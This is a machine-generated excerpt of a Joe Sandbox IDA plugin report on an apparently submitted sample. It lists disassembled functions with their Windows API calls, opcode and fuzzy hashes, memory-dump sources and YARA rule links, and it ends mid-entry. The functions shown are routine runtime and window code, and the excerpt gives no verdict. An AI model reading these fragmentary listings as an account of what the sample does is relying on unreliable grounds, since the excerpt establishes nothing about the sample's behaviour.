                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: File$PointerRead
                                                    • String ID:
                                                    • API String ID: 3154509469-0
                                                    • Opcode ID: 9f3c68bc3c1fcb334249cbc7be6e5be2ed9e198c07cd767f9bda29c0d9e46c92
                                                    • Instruction ID: a3f4eb64f39135bb668a4341f4e353b6e232f5de2de837c28755195aa249b040
                                                    • Opcode Fuzzy Hash: 9f3c68bc3c1fcb334249cbc7be6e5be2ed9e198c07cd767f9bda29c0d9e46c92
                                                    • Instruction Fuzzy Hash: 7F616171D00609AFDB04DFA8D945B9DFBB4FF09320F10836AE925A7390EB75A904CB95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0048F2C0 Relevance: 4.7, APIs: 3, Instructions: 183fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,D13B3340,?,00000000,?,80004005,?,00000000), ref: 0048F35E
                                                    • GetLastError.KERNEL32 ref: 0048F396
                                                    • GetLastError.KERNEL32(?), ref: 0048F42F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$CreateFile
                                                    • String ID:
                                                    • API String ID: 1722934493-0
                                                    • Opcode ID: 8364d545a0bf0241f1e81637ec259b7a25bf207ef48c4cf5d65d8791ead41f1a
                                                    • Instruction ID: 364be1e6f00d1f18464da6d793cb3e8a9d04e86fd5a1363b37d5c7b7a991456d
                                                    • Opcode Fuzzy Hash: 8364d545a0bf0241f1e81637ec259b7a25bf207ef48c4cf5d65d8791ead41f1a
                                                    • Instruction Fuzzy Hash: 0E51E231A006059FDB10EF69D845BAFF7B1FF54720F10866EE919973A0EB34A908CB84
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0051FABF Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 34memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,D13B3340,?,?,004B2007,00000000,D13B3340,?,004B2142), ref: 0051FB03
                                                    • HeapFree.KERNEL32(00000000,?,004B2007,00000000,D13B3340,?,004B2142), ref: 0051FB0A
                                                      • Part of subcall function 0051F977: GetProcessHeap.KERNEL32(00000000,D13B3340,?,0051FADD,?,?,?,004B2007,00000000,D13B3340,?,004B2142), ref: 0051F98F
                                                      • Part of subcall function 0051F977: HeapFree.KERNEL32(00000000,?,0051FADD,?,?,?,004B2007,00000000,D13B3340,?,004B2142), ref: 0051F996
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess
                                                    • String ID: `{5
                                                    • API String ID: 3859560861-770602540
                                                    • Opcode ID: ca10872eca6fbc39c664d7bae49cc0b196ded1d01403dac4aa8d00d6c5fc300b
                                                    • Instruction ID: 72ef890ac76fd2802c3d34360f6de250c555aff14432652a7b64d5f6b32a6a68
                                                    • Opcode Fuzzy Hash: ca10872eca6fbc39c664d7bae49cc0b196ded1d01403dac4aa8d00d6c5fc300b
                                                    • Instruction Fuzzy Hash: 16F0A732104601ABE6312B54EC1DFEB7FA9FFC1B61F154439F509421A09F74A8C4D7A1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0048E380 Relevance: 4.5, APIs: 3, Instructions: 30threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 0048E389
                                                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0058D0D0,000000FF), ref: 0048E398
                                                    • IsWindow.USER32(?), ref: 0048E3C5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Window$CurrentDestroyThread
                                                    • String ID:
                                                    • API String ID: 2303547079-0
                                                    • Opcode ID: f18e469cc7b36758fd47a09a8f60acb2c5536e38e2177b3217a895c5fbf43bfe
                                                    • Instruction ID: 796744155048348cb0ab1ca2b55b1e634dbe76a872dd85c481f34ccfc9920588
                                                    • Opcode Fuzzy Hash: f18e469cc7b36758fd47a09a8f60acb2c5536e38e2177b3217a895c5fbf43bfe
                                                    • Instruction Fuzzy Hash: CAF08271109B409AD774AB2AEE08B47BBD5BB48B10F051D0EE48696A90C7B4F840CB68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0046D360 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 217COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0035AB90: GetProcessHeap.KERNEL32 ref: 0035ABE5
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035AC17
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035ACA2
                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000025,00000000,D13B3340), ref: 0046D500
                                                      • Part of subcall function 0046D5C0: GetEnvironmentVariableW.KERNEL32(00000000,00000000,00000000,?,?,?,80004005), ref: 0046D5CD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Init_thread_footer$EnvironmentFolderHeapPathProcessSpecialVariable
                                                    • String ID: USERPROFILE
                                                    • API String ID: 1777821646-2419442777
                                                    • Opcode ID: c7581c4b36dcaf245fe3180b1f1e35ece27baf5784f7f439c33c115b9b9332e0
                                                    • Instruction ID: c79f1c271d21de18b5890afa8dd20fdf9ea75243c318ad2c778015efcd1e82f8
                                                    • Opcode Fuzzy Hash: c7581c4b36dcaf245fe3180b1f1e35ece27baf5784f7f439c33c115b9b9332e0
                                                    • Instruction Fuzzy Hash: C761BE70E006099FDB14DF68C859BAEB7B4FF44314F10826EE8169B391EB34AD04CB96
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00452170 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00520372: EnterCriticalSection.KERNEL32(00637DCC,?,?,?,0035AC36,006389FC,D13B3340,?,?,005484ED,000000FF,?,004AC28C,D13B3340,?,?), ref: 0052037D
                                                      • Part of subcall function 00520372: LeaveCriticalSection.KERNEL32(00637DCC,?,0035AC36,006389FC,D13B3340,?,?,005484ED,000000FF,?,004AC28C,D13B3340,?,?), ref: 005203BA
                                                    • __Init_thread_footer.LIBCMT ref: 004521E2
                                                      • Part of subcall function 00520328: EnterCriticalSection.KERNEL32(00637DCC,?,?,0035ACA7,006389FC,005A5FA0), ref: 00520332
                                                      • Part of subcall function 00520328: LeaveCriticalSection.KERNEL32(00637DCC,?,0035ACA7,006389FC,005A5FA0), ref: 00520365
                                                      • Part of subcall function 00520328: RtlWakeAllConditionVariable.NTDLL ref: 005203DC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                    • String ID: oZg
                                                    • API String ID: 2296764815-793252906
                                                    • Opcode ID: c60450dbe023b194cbb6990eee58969569901934cf5d8d2e76317653f150699a
                                                    • Instruction ID: de0558e408181cee5650a8c0fb1865fa6608fa0d5f54ecd7732320193ee9e1c7
                                                    • Opcode Fuzzy Hash: c60450dbe023b194cbb6990eee58969569901934cf5d8d2e76317653f150699a
                                                    • Instruction Fuzzy Hash: 7101D4B1A04604DBD710DF58ED4AB0977B1FB09720F10573AE916837D1DB36AD00CA55
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0051C94C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051C943
                                                      • Part of subcall function 0051D43D: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0051D448
                                                      • Part of subcall function 0051D43D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051D4B0
                                                      • Part of subcall function 0051D43D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051D4C1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                    • String ID: uc
                                                    • API String ID: 697777088-1107239587
                                                    • Opcode ID: a56fd07b8a20ec575c4ee76b1888e78304425599ac7a44cea56ab078897364d0
                                                    • Instruction ID: 64f1f450ef2a201fc4056a6afc6a757178a2b6112f3d30007a04f2e7f0c7a4a5
                                                    • Opcode Fuzzy Hash: a56fd07b8a20ec575c4ee76b1888e78304425599ac7a44cea56ab078897364d0
                                                    • Instruction Fuzzy Hash: F6B012C339E0157C7508532D7C06C760D6DE0C0F20730843BF404C0440E9C12C800871
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0053FF9D Relevance: 3.2, APIs: 2, Instructions: 177COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0053FACA: GetOEMCP.KERNEL32(00000000,?,?,?,?), ref: 0053FAF5
                                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,0053FDE1,?,00000000,?,?,?), ref: 0053FFFE
                                                    • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,0053FDE1,?,00000000,?,?,?), ref: 00540040
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CodeInfoPageValid
                                                    • String ID:
                                                    • API String ID: 546120528-0
                                                    • Opcode ID: 28546f1018bcc136b8db42c8c06e8e5205e4def342921d9e5e7ba3b25025115b
                                                    • Instruction ID: 6683e8b58cbf2bf8f22b4416ac76a939d97e4db3688f506b0f32f5de0c253f9c
                                                    • Opcode Fuzzy Hash: 28546f1018bcc136b8db42c8c06e8e5205e4def342921d9e5e7ba3b25025115b
                                                    • Instruction Fuzzy Hash: 0B510270A003459EDB21CF35C884BEAFFF5FF95308F28646ED29A87291D6749946CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0048E180 Relevance: 3.1, APIs: 2, Instructions: 80COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLastError.KERNEL32(0048DAE1), ref: 0048E180
                                                    • DestroyWindow.USER32(00000000,?,00000000), ref: 0048E237
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DestroyErrorLastWindow
                                                    • String ID:
                                                    • API String ID: 1182162058-0
                                                    • Opcode ID: 429e761198a4b599996e37dac660fc5ebee3633dd58f65e9f49d814f5ac445ec
                                                    • Instruction ID: 3592cd89a99e0506c3bfc30304be2a0c45cddc92c86446657c59a12fb85352eb
                                                    • Opcode Fuzzy Hash: 429e761198a4b599996e37dac660fc5ebee3633dd58f65e9f49d814f5ac445ec
                                                    • Instruction Fuzzy Hash: B221E4B26001099BD720AF09EC05BAB7799EB54320F004667FD04CB791DBB9EC64DBE5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00470920 Relevance: 3.0, APIs: 2, Instructions: 41windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0046FF30: LoadLibraryW.KERNEL32(ComCtl32.dll,D13B3340,?,?,00000000), ref: 0046FF6E
                                                      • Part of subcall function 0046FF30: GetProcAddress.KERNEL32(00000000,LoadIconMetric), ref: 0046FF91
                                                      • Part of subcall function 0046FF30: FreeLibrary.KERNEL32(00000000), ref: 0047000F
                                                    • SendMessageW.USER32(?,00000080,00000001,00000000), ref: 00470964
                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0047096F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: LibraryMessageSend$AddressFreeLoadProc
                                                    • String ID:
                                                    • API String ID: 3032493519-0
                                                    • Opcode ID: 4bf1d5f96a9c5e656d8fd8c2b56e78c05e25ff1e05c43ebb0e25a95565381877
                                                    • Instruction ID: 168c434457a1afb87605c37dbf6aa2e2248c3e4ca8b980899b290bcb3c7403e1
                                                    • Opcode Fuzzy Hash: 4bf1d5f96a9c5e656d8fd8c2b56e78c05e25ff1e05c43ebb0e25a95565381877
                                                    • Instruction Fuzzy Hash: 4DF0A03279521837F624215A1C03F27B64DD781B68F10427BFA88AB2C2ECC63C0502D9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0053820D Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000000,00000000,?,0053A1A9,00000000,00535FF3,00000000,?,00529D85,00000000,00535FF3,?,?,?,?,00535DED), ref: 00538223
                                                    • GetLastError.KERNEL32(?,?,0053A1A9,00000000,00535FF3,00000000,?,00529D85,00000000,00535FF3,?,?,?,?,00535DED), ref: 0053822E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 485612231-0
                                                    • Opcode ID: ad3e469761820f839048997a1c1c427244e1ec92d678e60b03e9f4bb2d270fb0
                                                    • Instruction ID: 0a9ad2783199ef4cb14f0184b2249c81d56d189bcf0f305a96dfb46d8595ec8d
                                                    • Opcode Fuzzy Hash: ad3e469761820f839048997a1c1c427244e1ec92d678e60b03e9f4bb2d270fb0
                                                    • Instruction Fuzzy Hash: 1DE08C32100B24AFCB152FB5BC0CBBA7F99BF42391F104020F608871A0EF70989497A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00521BAC Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00524C57: FlsAlloc.KERNEL32(?,00521BB6,00521AB9,00523D4F), ref: 00524C85
                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00521BCA
                                                    • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00521BD5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AllocValue___vcrt____vcrt_uninitialize_ptd
                                                    • String ID:
                                                    • API String ID: 1208342256-0
                                                    • Opcode ID: 1106db3dec2b25403c582c27f6fef55cdff6728e5db7cf178220e06c38ea3a66
                                                    • Instruction ID: bb88e0c77375686d46c2713367a2ad1372c8df9b2bcd6c324c07733681dfefb7
                                                    • Opcode Fuzzy Hash: 1106db3dec2b25403c582c27f6fef55cdff6728e5db7cf178220e06c38ea3a66
                                                    • Instruction Fuzzy Hash: 14D0A926148F320C8D1827B4380A49B2EAABCB37B0BA01A4AF020A61C2FF1984416959
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0051F855 Relevance: 3.0, APIs: 2, Instructions: 17libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetProcAddress.KERNEL32(?,?), ref: 0051F85E
                                                    • RtlEncodePointer.NTDLL(00000000,?,0051F7E8,00000000,AtlThunk_AllocateData,00637D78,?,0051FB44,00637D7C,?,00000000,?,00495F5C,?,00000000,00000000), ref: 0051F86D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AddressEncodePointerProc
                                                    • String ID:
                                                    • API String ID: 1846120836-0
                                                    • Opcode ID: 7c4fa8bd3b3b93ce24ae6072c69bf39d325288fca61eb852685b85de1e111488
                                                    • Instruction ID: ecdb94088ca15837eaf5b034e46ce161bbc1e5215475c705a58a91a4801aec23
                                                    • Opcode Fuzzy Hash: 7c4fa8bd3b3b93ce24ae6072c69bf39d325288fca61eb852685b85de1e111488
                                                    • Instruction Fuzzy Hash: E6D09279540308AB8F015FA6EC089EA3BA9BF5A7657008064F91D86620EB329466AB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00456270 Relevance: 2.6, APIs: 2, Instructions: 68COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000003,00000000,80000004,000000FF,00000000,00000000,?,?,006394D0,004A03D0,?), ref: 00456288
                                                    • MultiByteToWideChar.KERNEL32(00000003,00000000,80000004,000000FF,?,-00000001), ref: 004562BA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide
                                                    • String ID:
                                                    • API String ID: 626452242-0
                                                    • Opcode ID: 773adce2a9d801cde503944c79f29ca08cff23d7e9641058a2328bfabaaf98a0
                                                    • Instruction ID: e29de55a8b672018bbf1ad90450c79879b05b3750671d26e1cfff70d8dc03595
                                                    • Opcode Fuzzy Hash: 773adce2a9d801cde503944c79f29ca08cff23d7e9641058a2328bfabaaf98a0
                                                    • Instruction Fuzzy Hash: C501D635301111AFD6119B59DC89F6EB759EF95322F20422EFB149B3D1CE606C069794
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0053FB9E Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCPInfo.KERNEL32(E8458D00,?,0053FDED,0053FDE1,00000000), ref: 0053FBD0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Info
                                                    • String ID:
                                                    • API String ID: 1807457897-0
                                                    • Opcode ID: bc54a1ddea7e3d52042b13918276ba30cf097af290eab046b346aa4c2c99abba
                                                    • Instruction ID: e54882744ad652f40e492232944cd40db5407c73959c02de59a2a8fdab940f72
